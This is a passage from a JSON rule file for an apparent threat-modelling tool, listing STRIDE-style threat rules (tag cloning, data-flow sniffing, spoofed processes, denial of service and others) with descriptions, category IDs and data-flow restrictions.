exploited.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"758fa1ec-35f3-44a2-9f3d-0e5c21fc92c4","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"82c0d2ca-5756-40bd-a2e9-3c7ab8c5c2ba","Name":"Tag cloning","Description":"A cloned tag may enable access to sensitive data or restricted areas","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"de170dec-af60-4cc7-8daf-946b3fa53132","DetailRestrictions":[]},"Severity":2},{"ID":"bd2cf4bb-a728-46bd-8d38-269b4cfef7be","Name":"Tag tracking","Description":"Tracking a tag by its unique identifier allows, for example, to create a movement profile","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["61d04f2d-83b1-4152-9aba-4ad188eef06d","2765e61e-29a9-498e-adf8-4d653f488e3d"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"de170dec-af60-4cc7-8daf-946b3fa53132","DetailRestrictions":[]},"Severity":2},{"ID":"d07d24f4-10b5-452d-a489-10c9752dda4d","Name":"Tag inventorying","Description":"Tags with an EPC are vulnerable to inventory attacks. For example, medical devices such as pacemakers can be used to draw conclusions about the health of individuals.","IsActive":true,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","e6ba8518-0074-492c-95e5-ebe89fa601fe"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"de170dec-af60-4cc7-8daf-946b3fa53132","DetailRestrictions":[{"IsOR":true,"Layer":0,"RestType":1,"PropertyRest":{"ID":"355ded09-e3ae-41f7-8bbb-3fa0870e35a6","ComparisonType":"==","Value":true}}]},"Severity":2},{"ID":"6394d7a4-c2db-4fe6-826c-93b1cd0d5373","Name":"Location tracking","Description":"","IsActive":true,"RuleGenerationType":1,"Mapping":{"AttackVectorID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","ThreatCategoryIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","2765e61e-29a9-498e-adf8-4d653f488e3d","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},"overridenRuleIDs":[],"RuleType":1,"StencilRestriction":{"stencilTypeID":"840b5bd1-b250-427c-bf56-5ddf826382ff","DetailRestrictions":[]},"Severity":3},{"ID":"66f7a456-2edb-4d91-9bd1-aec421a92011","Name":"Sending data to spoofed data store","Description":"Process has outbound data flow to data store. E.g., database is spoofed, process writes to wrong place. (see Threat modeling - designing for security: Table 3-10-1)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"ddc5a2f1-7466-488d-a4f4-9f6a1520a00e","Name":"Sending confidential data to data store","Description":"Process has outbound data flow to data store. E.g. process writes information to data store which should not be there. (see Threat modeling - designing for security: Table 3-10-1)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"4d724289-8fe3-47c5-b44b-7fd9cac6c701","Name":"Sending data to spoofed process","Description":"Process sends output to another process. E.g., Process2 is spoofed, Process1 writes to wrong place. (see Threat modeling - designing for security: Table 3-10-2)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"97682dbc-2fb9-456d-94c3-a6a09998b5a4","Name":"Process denies receiving data","Description":"Process sends output to another process. E.g., Process2 claims not to have received data from Process1. (see Threat modeling - designing for security: Table 3-10-2)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"9e788439-62ed-44ea-9b19-093f92cf2223","Name":"Sending confidential data to process","Description":"Process sends output to another process. E.g., Process2 is not authorized to receive data. (see Threat modeling - designing for security: Table 3-10-2)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"30b01ab6-2eea-49ff-ac4e-f5838f8a8337","Name":"Sending data to spoofed log. external entity","Description":"Process sends output to log. external entity. E.g., external entity is spoofed. (see Threat modeling - designing for security: Table 3-10-3)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesReceiverAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"4f56c6cd-3daa-4b7a-91a5-740403957ff5","Name":"External entity denies receiving data","Description":"Process sends output to log. external entity. E.g., browser disclaims and doesn\'t acknowledge the output. (see Threat modeling - designing for security: Table 3-10-3)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"7b140721-9f7a-46a7-8290-931efec07769","Name":"Sending confidential data to log. external entity","Description":"Process sends output to log. external entity. E.g., ext. entity gets data it\'s not authorized to get. (see Threat modeling - designing for security: Table 3-10-3)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"557991c1-4eeb-40e1-96c3-c8a214278e29","Name":"Phy. external entity denies receiving data","Description":"Process sends output to phy. external entity. E.g., human disclaims seeing the output. (see Threat modeling - designing for security: Table 3-10-4)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["03e3750c-8549-4589-8269-e0121b3f26a4"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"8fabcdad-c70f-4416-8cb6-5c65a21142b0","Name":"Receiving data from spoofed data store","Description":"Process has inbound data flow from data store. E.g., database is spoofed and process reads the wrong data. (see Threat modeling - designing for security: Table 3-10-5)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"f5894534-60a9-4363-84e5-4c0479ca71b9","Name":"Processing corrupted data","Description":"Process has inbound data flow from data store. E.g., process is corrupted by data read from the data store. (see Threat modeling - designing for security: Table 3-10-5)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f0e814f3-b3d2-4357-b155-8fffd70ec42e"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"71f98504-8182-4fb2-81ed-aea1e1953215","Name":"Process denies services due to received data","Description":"Process has inbound data flow from data store. E.g., process state is corrupted by the data retrieved from the data store. (see Threat modeling - designing for security: Table 3-10-5)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"6d1d58a3-f4ff-4938-93d8-d91bb9ae3f58","Name":"Receiving data leads to code execution","Description":"Process has inbound data flow from data store. E.g., process internal state is corrupted based on data read from the data store, leading to code execution. (see Threat modeling - designing for security: Table 3-10-5)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["8687e614-c127-418b-8fda-536bb2f0708f"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"6ca91e1b-746c-47bb-8cd3-2fa0c478042e","Name":"Receiving data from spoofed process","Description":"Process has inbound data flow from another process. E.g., Process1 believes it\'s getting data from Process2. (see Threat modeling - designing for security: Table 3-10-6)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"a1b5637c-fac3-4b49-bf3f-5f39ce8757da","Name":"Process denies receiving data","Description":"Process has inbound data flow from another process. E.g., Process1 denies getting data from Process2. (see Threat modeling - designing for security: Table 3-10-6)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"c0158e50-7c0f-4457-a8ea-223ff165fdaf","Name":"Process denies services","Description":"Process has inbound data flow from another process. E.g., Process1 crashes due to interaction with Process2. (see Threat modeling - designing for security: Table 3-10-6)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"984d970a-8ef5-445c-a15b-7613b313306c","Name":"Receiving data leads to code execution","Description":"Process has inbound data flow from another process. E.g., Process2 passes data or args that allow it to change flow of execution of Process1. (see Threat modeling - designing for security: Table 3-10-6)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"a7f340d4-3aa2-45d2-9226-db55414c7f69","Name":"Receiving data from spoofed external entity","Description":"Process has inbound data flow from external entity. E.g., Process believes it\'s getting data from the ext. entity, when it fact it\'s a random attacker. (see Threat modeling - designing for security: Table 3-10-7)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["3bbe354c-317a-4f76-bdbb-75543b5d5aa4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesSenderAuthenticity","ComparisonType":"==","Value":false}}]}},{"ID":"2a2ea224-58c9-4187-b721-940fc97b1c04","Name":"Process denies services","Description":"Process has inbound data flow from external entity. E.g., process crashes due to ext. entity interaction. (see Threat modeling - designing for security: Table 3-10-7)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"c1e53b74-7e9d-4566-b690-978bfc8b9af3","Name":"Receiving data leads to code execution","Description":"Process has inbound data flow from external entity. E.g., ext. entity passes data or args that allow it to change flow of execution of process. (see Threat modeling - designing for security: Table 3-10-7)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["8687e614-c127-418b-8fda-536bb2f0708f"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["02b39924-b8f2-44da-a2bc-be1bd2450f68","03e3750c-8549-4589-8269-e0121b3f26a4"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"35915020-1d0c-4853-849d-d32159bf6401","Name":"Tampering with data flow","Description":"Data flow crosses trust boundary. E.g., data flow is modified by MITM attack. (see Threat modeling - designing for security: Table 3-10-8)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f0e814f3-b3d2-4357-b155-8fffd70ec42e"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesIntegrity","ComparisonType":"==","Value":false}}]}},{"ID":"1308104d-16da-432f-a70f-8de14a8bfbf9","Name":"Data flow sniffing","Description":"Data flow crosses trust boundary. E.g., the contents of the data flow are sniffed on the wire. (see Threat modeling - designing for security: Table 3-10-8)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}},{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":1,"PropertyRest":{"ID":"ProvidesConfidentiality","ComparisonType":"==","Value":false}}]}},{"ID":"3008afca-320c-489b-9ff6-f61b7cdf497c","Name":"Denial of service","Description":"Data flow crosses trust boundary. E.g., the data flow is interrupted by an ext. entity, e.g. messing with TCP sequence numbers. (see Threat modeling - designing for security: Table 3-10-8)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":-1,"NodeTypes":[{"TypeIDs":[]},{"TypeIDs":[]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"46a79465-8cb7-4c8e-8025-e1a08e9620d8","Name":"Corrupting the data store","Description":"Process has outbound data flow to data store. E.g., data store is corrupted. (see Threat modeling - designing for security: Table 3-10-9)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["f0e814f3-b3d2-4357-b155-8fffd70ec42e"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"134a6570-e75e-4c8a-bd2f-f02b5a052878","Name":"Data store reveals information","Description":"Process has outbound data flow to data store. E.g., data store reveals information. (see Threat modeling - designing for security: Table 3-10-9)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"4c4d3f55-3ffd-4416-9bc3-4bf2921110e1","Name":"Process denies writing data","Description":"Process has outbound data flow to data store. E.g., process claims not to have written to data store. (see Threat modeling - designing for security: Table 3-10-9)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"0115bdb1-d2ab-4bbc-bfd1-b23c831b5a70","Name":"Data store cannot be written to","Description":"Process has outbound data flow to data store. E.g., data store cannot be written to. (see Threat modeling - designing for security: Table 3-10-9)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":1,"NodeTypes":[{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]},{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"b06930a0-bff1-49e4-889c-6211290de683","Name":"Process denies reading data","Description":"Process has inbound data flow from data store. E.g., process claims not to have read from data store. (see Threat modeling - designing for security: Table 3-10-10)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["a77f314c-f74e-4340-a993-5a1a24f26db4"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"2a171a21-0d62-4159-b7ab-5e2ad1796fff","Name":"Data store reveals information","Description":"Process has inbound data flow from data store. E.g., data store discloses information. (see Threat modeling - designing for security: Table 3-10-10)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["369640cc-1b53-4a2e-9e3b-a74c187e68e7"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"7e4e6144-6504-4796-a3ca-00962c0a9cbb","Name":"Data store cannot be read from","Description":"Process has inbound data flow from data store. E.g., data store cannot be read from. (see Threat modeling - designing for security: Table 3-10-10)","IsActive":false,"RuleGenerationType":1,"Mapping":{"ThreatCategoryIDs":["422b9042-212d-4467-a000-2528a2e09f8b"]},"overridenRuleIDs":[],"RuleType":2,"DFDRestriction":{"AppliesReverse":false,"Target":0,"NodeTypes":[{"TypeIDs":["c7598413-4382-43e9-9904-fd9d877eb7a9"]},{"TypeIDs":["e0b99432-98a6-4e32-86d7-ca5f58897cc2"]}],"NodeRestrictions":[{"Layer":0,"NodeNumber":-1,"IsOR":false,"RestType":2,"PropertyRest":{"ID":"","ComparisonType":"==","Value":null},"DataflowRest":{"TrustAreaIDs":[]}}]}},{"ID":"d59a4a10-780a-465b-86fa-292a07e7a89a","Name":"External entity is spoofed","Description":"Ext. entity passes input to process. E.g., process is confused by the identify of the ext. entity. (see Threat modeling - designing for security: Table 